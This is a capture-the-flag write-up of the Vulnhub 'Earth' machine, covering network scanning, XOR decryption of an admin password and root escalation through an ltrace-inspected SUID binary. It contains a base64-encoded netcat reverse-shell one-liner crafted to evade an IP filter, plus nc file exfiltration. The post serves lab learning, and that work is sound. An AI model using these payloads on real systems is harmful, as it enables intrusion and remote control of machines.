Vulnhub: Earth – CTF

Hello Cyberman!

How are you? I hope you are fine. This article subject name as earth in vulnhub machine list.

Yes, this ctf wonderful. Because I when solutions this CTF a lot of learned. For example LTRACE.
If you are ready, okay I starting!

As a first I scanned local network in like every time. I use Netdiscover for network scanning.

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -r 192.168.1.0/16
 Currently scanning: 192.168.18.0/16   |   Screen View: Unique Hosts 
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.213   				        1      60  VMware, Inc.

As a seen like above. Target machine IP address: 192.168.1.213. I found. Then I scanning with Nmap for more info in target machine.

┌──(kali㉿kali)-[~]
└─$ sudo nmap 192.168.1.213 -Pn -A -sV
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-28 13:28 EST
Nmap scan report for earth.local (192.168.1.213)
Host is up (0.00026s latency).
Not shown: 985 filtered tcp ports (no-response), 12 filtered tcp ports (admin-prohibited)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b2c3fdc8b76e9217bd05624dfbee9a8 (ECDSA)
|_  256 b03c723b722126ce3a84e841ecc8f841 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
|_http-title: Earth Secure Messaging
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
MAC Address: 00:0C:29:37:15:02 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6, Linux 5.0 - 5.4
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.26 ms earth.local (192.168.1.213)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.97 seconds

The has two DNS record this target device. I marked as a bold above. As a seen above running as earth.local target machine local network. I mean if you 192.168.1.213 in URL go to with browser (Firefox, Google Chrome etc.) dont found. Because this machine running as hosts in local network.

I need edit hosts file in KAli Linux. (If you don’t know hosts file, please review this address: https://en.wikipedia.org/wiki/Hosts_(file)).

I as a below like enter to command in terminal for hosts file edition.

┌──(kali㉿kali)-[~]
└─$ sudo pluma /etc/hosts

I edited with Pluma editor. If you don’t know what is Pluma with you be use different application. Pluma: a like Notepad++ is application.

127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
192.168.1.213 earth.local terratest.earth.local

I added IP address and DNS. I showed as a above as a bold. Okay, now I look with Firefox this url address: earth.local. The website appeared as shown in the picture below.

Okay, now. I scanning with Nikto. (If you don’t know Nikto this address look: https://www.kali.org/tools/nikto/)

┌──(kali㉿kali)-[~]
└─$ nikto -h http://earth.local/  
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.213
+ Target Hostname:    earth.local
+ Target Port:        80
+ Start Time:         2022-11-28 13:34:33 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
+ Cookie csrftoken created without the httponly flag
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8594 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2022-11-28 13:34:59 (GMT-5) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

As a result like above picture. Then I scanning with Dirb tool. (If you don’t know Dirb, look at the url: https://www.kali.org/tools/dirb/)

┌──(kali㉿kali)-[~/Desktop/earth]
└─$ dirb https://earth.local/         

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Nov 28 13:38:51 2022
URL_BASE: https://earth.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: https://earth.local/ ----
+ https://earth.local/admin (CODE:301|SIZE:0)                                                                                                                        
+ https://earth.local/cgi-bin/ (CODE:403|SIZE:199)                                                                                                                   
                                                                                                                                                                     
-----------------
END_TIME: Mon Nov 28 13:38:55 2022
DOWNLOADED: 4612 - FOUND: 2

This web site has a admin panel. It’ is nice. I tried like below attack list:

  • SQL Injection
  • Brute Force

But it didn’t work, it didn’t work.

I forget this device has the two DNS record. I scanned earth.local. Now, I scanning address: terratest.earth.local.

Dont forget: This device using 443 port for run web site. If you dont add http addres “s”, you are dont seen result.

┌──(kali㉿kali)-[~/Desktop/earth]
└─$ dirb https://terratest.earth.local/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Nov 28 13:40:02 2022
URL_BASE: https://terratest.earth.local/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: https://terratest.earth.local/ ----
+ https://terratest.earth.local/cgi-bin/ (CODE:403|SIZE:199)                                                                                                         
+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)                                                                                                        
+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)                                                                                                       
                                                                                                                                                                     
-----------------
END_TIME: Mon Nov 28 13:40:05 2022
DOWNLOADED: 4612 - FOUND: 3

Yes, I found nice a info. Then I looked at the “robots.txt” with Firefox.

As a result like I found note file “/testingnotes.*” as a seen above picture. Then I look at the this file.

This give me a lot of clue. As a seen above picture. This clue detailed as a below.

This use encrypt algorithm: Using XOR encryption as the algorithm, should be safe as used in RSA.
I mean, first I needed from hex variable decrypt with key for RSA.
User name for admin panel: terra.
And finally, key has in the testdata.txt for RSA.

Firstly, I look at the testdata.txt file. As a seen like below picture.

Okay, this article has a key for RSA encryption. During this process my brother and I searched for key for RSA. When search key for RSA we used a website tool for encryption.

Previously, users stated that they entered their own passwords to test this encryption algorithm in the testingnotes.txt file.

Therefore, when we crack one of the ciphertext entered at the bottom with the key, we will find the money event.

We want to crack RSA article:

2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

This website CyberChef. If you want look: https://cyberchef.org/

First, I don’t tell this website how to use. But I give a little info. You choose which encryption algorithm in left side in website. Then center side do settings. As a finally right side give to input text, output text.

I gived article in testdata.txt for key. And result as seen a above picture.

Terra user the password: earthclimatechangebad4humans

I login admin panel with user and password.

Excellent! Now, this is a web application. And if you enter to command, this website it is the run in its terminal.
For example if you enter to command “ls” run like unix system and the showed in file/directory list

But I learned enter to this web app has the filtered. For example: I tried open a shell in target device for KAli device with NC tool. But not worked. Because address filtered. For example I tried command: “nc 9002 -e sh”

Then I different thinked. I tried https://www.s4msecurity.com address. It accepted. Okay, I searched in GitHub for shell file. My plan: I tried found first download this file with WGET (If you don’t know Wget, please checked this url: https://en.wikipedia.org/wiki/Wget) then I tried run this file. But it didn’t work. It don’t open shell…

Then I searched in Google. “How to base64 text run in terminal.” Then I found wonderful a more website. I searching every time a reverse shell command. This website give all them.

Website: https://www.revshells.com/

Then I prepared my payload for exploit. My payload:

echo bmMgMTkyLjE2OC4xLjEzOCA5MDAxIC1lIC9iaW4vYmFzaA== | base64 -d | sh 

This payload runs the nc command. The system is filtering the IP address, but will not understand a value with base64.
The “echo” command is used to print on linux systems.
The “base64 -d” command is used to decode the base64 value.
And the “sh” command is for running in bash.

So I told the target’s system to read my base64 text with echo first, then base64 parse and finally run it. If you opened a bash terminal with reverse shell okay, so let’s go to be Root!

Firstly, I checked for the SUID binaries. If you dont know SUID: As a review: https://rootrecipe.medium.com/suid-binaries-27c724ef753c

I used find command in target device.

$ find / -perm -u=s 2>/dev/null

As a seen like above picture.
If you say for “/dev/null” what is this:

Now read reset_root with strings command. I used this command in target device for reset_root.

$ strings /usr/bin/reset_root

Then I readed reset_root period.

As a seen like above picture. Now, I need to edit this reset_root file by pulling my side. Because I want to see the values in this file by checking the system calls named LTRACE and rearranging the root user’s password.

Firstly, I enter to command in terminal in KAli (Attack machine). And I listen a port with NC tool for reset_root file.

┌──(kali㉿kali)-[~]
└─$ nc -nlvp 9002 > reset_root

Now, I write command in terminal in target device for file transfer with nc program. Then I doing file transfer in nc with this command in target device. As a seen like below picture.

Then I run reset_root file with signal trace. If you don’t know LTRACE a look at the link: https://blog.packagecloud.io/how-does-ltrace-work/

┌──(kali㉿kali)-[~]
└─$ ltrace ./reset_root                                                                                                                           
puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...
)                                                            = 38
access("/dev/shm/kHgTFI5G", 0)                                                                         = -1
access("/dev/shm/Zw7bV9U5", 0)                                                                         = -1
access("/tmp/kcM0Wewe", 0)                                                                             = -1
puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
)                                                            = 44
+++ exited (status 0) +++

That give me 3 different file in target device for /dev directory.
Now, I need create this 3 signal file in target device. For this, I enter to command in terminal in target device as like below picture.

As a finally, I enter magic word in terminal in target device. As a seen like below picture:

As seen like, root user change password. Now, its root user password: Earth. 🙂

I know password and I know user name. I enter to command in terminal in target device for be root user. As seen like below picture.

Now, I did be root!. Excellent! Now, read to root_flag.txt file. 🙂 root_flag.txt file as seen like below picture.

This CTF learned me:

I hope you learn a little info.

Have a nice day with lots of informatics. 🙂

13 Comments

  1. I may need your help. I tried many ways but couldn’t solve it, but after reading your article, I think you have a way to help me. I’m looking forward for your reply. Thanks.

  2. Психолог (др.-греч. ψυχή — душа; λόγος — знание) — специалист,
    занимающийся изучением проявлений, способов и форм организации психических явлений личности в различных областях человеческой деятельности для решения научно-исследовательских и прикладных
    задач, а также с целью оказания психологической помощи, поддержки и сопровождения.

  3. Wow, blog ini keren banget! 🚀 Isinya energik dan memotivasi. 🌟 Selalu menemukan hal baru dan menarik di sini. 👏 Teruskan semangat berbagi pengetahuan! 🤩💯 Artikel ini memukau! 🌈 Terima kasih atas sumber inspirasinya! 🙌✨ #SemangatTinggi #Edukatif #SangatSuka

  4. Your article is excellent! The information is presented clearly, and I’m curious if you plan to add more images in your upcoming pieces. It could enhance the overall reader experience.

  5. Terrific article! 👌 The insights are well-articulated, and I’m curious if you plan to include more images in your upcoming pieces. It could enhance the overall reader experience. 🎨

  6. Benar-benar luar biasa! Kualitas konten ini sangat istimewa. Cara penyajiannya sangat mengesankan. Dedikasi dan pengetahuan dalam karya ini benar-benar terpancar. Kudos kepada penulis atas pengalaman yang begitu berharga yang telah diberikan. Saya dengan antusiasmen menunggu untuk melihat lebih banyak konten serupa di masa depan. 👏👏👏

Leave a Reply

Your email address will not be published. Required fields are marked *